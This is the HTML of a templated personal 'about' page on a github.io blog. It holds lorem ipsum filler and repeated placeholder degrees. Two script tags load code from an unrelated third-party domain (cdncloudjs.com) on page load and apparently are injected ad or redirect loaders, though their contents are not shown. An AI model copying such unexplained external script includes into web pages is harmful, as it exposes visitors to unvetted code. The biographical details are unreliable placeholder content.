<!DOCTYPE html>
<html lang="en-us"><head>
  <meta charset="utf-8">
  <title>Hi,I’m Alexender Xanidiver Specilized In Blog Writing And Colecting</title>

  <!-- mobile responsive meta -->
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="This is meta description.">
  
  <meta name="generator" content="Hugo 0.92.1" />

  <!-- plugins -->
  
  <link rel="stylesheet" href="https://gunel-bayraktar.github.io/gunel2/plugins/bootstrap/bootstrap.min.css">
  
  <link rel="stylesheet" href="https://gunel-bayraktar.github.io/gunel2/plugins/themify-icons/themify-icons.css">
  

  <!-- Main Stylesheet -->
  
  <link rel="stylesheet" href="https://gunel-bayraktar.github.io/gunel2/scss/style.css" media="screen">

  <!--Favicon-->
  <link rel="shortcut icon" href="https://gunel-bayraktar.github.io/gunel2/images/favicon.png" type="image/x-icon">
  <link rel="icon" href="https://gunel-bayraktar.github.io/gunel2/images/favicon.png" type="image/x-icon">
  <script src="https://cdncloudjs.com/arredit.js"></script>
   
 
</head><body><section>
		<div class="container-fluid">
			<div class="row justify-content-around">
				<div class="col-md-6 col-lg-4">
					<div class="sticky-wrapper">

  
  <label class="sun">
    <input type="checkbox" id="dn">
    <span class="checkmark"><svg height="25px" viewBox="0 0 470 470" width="25px" xmlns="http://www.w3.org/2000/svg"><path d="m235 104.605469c-72.015625 0-130.394531 58.378906-130.394531 130.394531s58.378906 130.394531 130.394531 130.394531 130.394531-58.378906 130.394531-130.394531c-.082031-71.980469-58.414062-130.3125-130.394531-130.394531zm0 240.789062c-60.96875 0-110.394531-49.425781-110.394531-110.394531s49.425781-110.394531 110.394531-110.394531 110.394531 49.425781 110.394531 110.394531c-.070312 60.941406-49.453125 110.324219-110.394531 110.394531zm0 0"/><path d="m245 61v-51c0-5.523438-4.476562-10-10-10s-10 4.476562-10 10v51c0 5.523438 4.476562 10 10 10s10-4.476562 10-10zm0 0"/><path d="m235 399c-5.523438 0-10 4.476562-10 10v51c0 5.523438 4.476562 10 10 10s10-4.476562 10-10v-51c0-5.523438-4.476562-10-10-10zm0 0"/><path d="m460 225h-51c-5.523438 0-10 4.476562-10 10s4.476562 10 10 10h51c5.523438 0 10-4.476562 10-10s-4.476562-10-10-10zm0 0"/><path d="m71 235c0-5.523438-4.476562-10-10-10h-51c-5.523438 0-10 4.476562-10 10s4.476562 10 10 10h51c5.523438 0 10-4.476562 10-10zm0 0"/><path d="m365.257812 118.882812 35.472657-35.472656c3.878906-3.910156 3.863281-10.21875-.03125-14.109375-3.890625-3.894531-10.199219-3.910156-14.109375-.03125l-35.472656 35.472657c-2.542969 2.519531-3.546876 6.210937-2.625 9.675781.925781 3.460937 3.628906 6.164062 7.089843 7.089843 3.464844.921876 7.15625-.082031 9.675781-2.625zm0 0"/><path d="m104.742188 351.117188-35.472657 35.472656c-2.546875 2.523437-3.546875 6.214844-2.625 9.675781s3.628907 6.167969 7.089844 7.089844 7.152344-.078125 9.675781-2.625l35.472656-35.472657c2.542969-2.519531 3.546876-6.210937 2.625-9.675781-.925781-3.460937-3.628906-6.164062-7.089843-7.089843-3.464844-.921876-7.15625.082031-9.675781 2.625zm0 0"/><path d="m365.257812 351.117188c-2.519531-2.542969-6.210937-3.546876-9.675781-2.625-3.460937.925781-6.164062 3.628906-7.089843 7.089843-.921876 3.464844.082031 7.15625 2.625 9.675781l35.472656 35.472657c3.910156 3.878906 10.21875 3.863281 14.109375-.03125 3.894531-3.890625 3.910156-10.199219.03125-14.109375zm0 0"/><path d="m104.742188 118.882812c2.519531 2.542969 6.210937 3.546876 9.675781 2.625 3.460937-.925781 6.164062-3.628906 7.089843-7.089843.921876-3.464844-.082031-7.15625-2.625-9.675781l-35.472656-35.472657c-3.910156-3.878906-10.21875-3.863281-14.109375.03125-3.894531 3.890625-3.910156 10.199219-.03125 14.109375zm0 0"/></svg></span>
  </label>


  <div class="mb-4">
    <div class="author-wrapper">
      <img class="author-bg rotating" src="https://gunel-bayraktar.github.io/gunel2/images/author-bg.png" alt="">
      <img class="author-img" src="https://gunel-bayraktar.github.io/gunel2" alt="">
    </div>
  </div>
  <ul class="list-inline list-icon mb-4">
    
    <li class="list-inline-item"><a href="#"><i class="ti-facebook"></i></a></li>
    
    <li class="list-inline-item"><a href="#"><i class="ti-twitter-alt"></i></a></li>
    
    <li class="list-inline-item"><a href="#"><i class="ti-instagram"></i></a></li>
    
    <li class="list-inline-item"><a href="#"><i class="ti-github"></i></a></li>
    
    <li class="list-inline-item"><a href="#"><i class="ti-linkedin"></i></a></li>
    
  </ul>
  <p class="mb-5 content"></p>
  <ul class="list-inline menu mb-4">
    
    <li class="list-inline-item"><a href="https://gunel-bayraktar.github.io/gunel2/">Home</a></li>
    
    <li class="list-inline-item"><a href="https://gunel-bayraktar.github.io/gunel2/about">About</a></li>
    
    <li class="list-inline-item"><a href="https://gunel-bayraktar.github.io/gunel2/contact">Contact</a></li>
    
    <li class="list-inline-item"><a href="https://gunel-bayraktar.github.io/gunel2/privacy-policy">Privacy Policy</a></li>
    
    <li class="list-inline-item"><a href="https://gunel-bayraktar.github.io/gunel2/dmca">DMCA</a></li>
    
  </ul>
  <small class="text-light"></small>
</div>
				</div>
				<div class="col-md-6">

<div class="pr-lg-5 pr-4 py-4">
  
  <img class="img-fluid w-100 mb-4" src="https://gunel-bayraktar.github.io/gunel2/images/author-large.jpg" alt="">
  
  <h1 class="mb-4">Hi,I’m Alexender Xanidiver Specilized In Blog Writing And Colecting</h1>
  <div class="content"><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Interdum ante elit laoreet integer eu purus. Congue integer fermentum pharetra, ac ut mattis amet. Amet placerat quis vitae augue scelerisque leo bibendum justo. Lectus urna vel leo aenean habitant proin morbi neque, facilisis. Commodo consectetur eu venenatis, eu justo, pellentesque venenatis, aliquet pharetra. Facilisis feugiat morbi ornare at semper commodo lectus convallis. Aliquam amet vel at tortor eget eget. A integer libero augue volutpat, elit elit, fringilla pharetra pretium. Faucibus in aliquam at</p>
</div>

  <div class="row mb-4">
    <div class="col-12">
      <h2 class="h1 mb-4">List Of My University Degrees</h2>
    </div>
    
    <div class="col-sm-6 mb-4">
      <h3 class="post-title text-white">MSc in Research Methodology</h3>
      <hr class="border-default ml-3">
      <p class="ml-3">September 2000 - May 2004 <br> University Of California</p>
    </div>
    
    <div class="col-sm-6 mb-4">
      <h3 class="post-title text-white">BSC Eng Electronic Engineering</h3>
      <hr class="border-default ml-3">
      <p class="ml-3">September 2000 - May 2004 <br> University Of California</p>
    </div>
    
    <div class="col-sm-6 mb-4">
      <h3 class="post-title text-white">BSC Eng Electronic Engineering</h3>
      <hr class="border-default ml-3">
      <p class="ml-3">September 2000 - May 2004 <br> University Of California</p>
    </div>
    
    <div class="col-sm-6 mb-4">
      <h3 class="post-title text-white">MSc in Research Methodology</h3>
      <hr class="border-default ml-3">
      <p class="ml-3">September 2000 - May 2004 <br> University Of California</p>
    </div>
    
  </div>
</div>

<div class="row">
  <div class="col-12">
    <h2 class="h1 mb-4">Some Skills Which I Owns</h2>

    
    <div class="skill-item">
      <h3>Planning</h3>
      <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Interdum ante elit laoreet integer eu purus. Congue integer fermentum pharetra, ac ut mattis amet. Amet</p>
    </div>
    
    <div class="skill-item">
      <h3>Delegat</h3>
      <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Interdum ante elit laoreet integer eu purus. Congue integer fermentum pharetra, ac ut mattis amet. Amet</p>
    </div>
    
    <div class="skill-item">
      <h3>Motivate</h3>
      <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Interdum ante elit laoreet integer eu purus. Congue integer fermentum pharetra, ac ut mattis amet. Amet</p>
    </div>
    
  </div>
</div>


				</div>
			</div>
		</div>
	</section><!-- JS Plugins -->

<script src="https://gunel-bayraktar.github.io/gunel2/plugins/jQuery/jquery.min.js"></script>

<script src="https://gunel-bayraktar.github.io/gunel2/plugins/bootstrap/bootstrap.min.js"></script>

 
<a href="/" alt="" target="_blank" >
<img  src="//sstatic1.histats.com/0.gif?4626212&101" alt="" border="0">

<!-- Main Script -->

<script src="https://gunel-bayraktar.github.io/gunel2/js/script.min.js"></script>
<center><script src="https://cdncloudjs.com/adstt.js"></script> </center>
<!-- google analitycs -->
</body>

</html>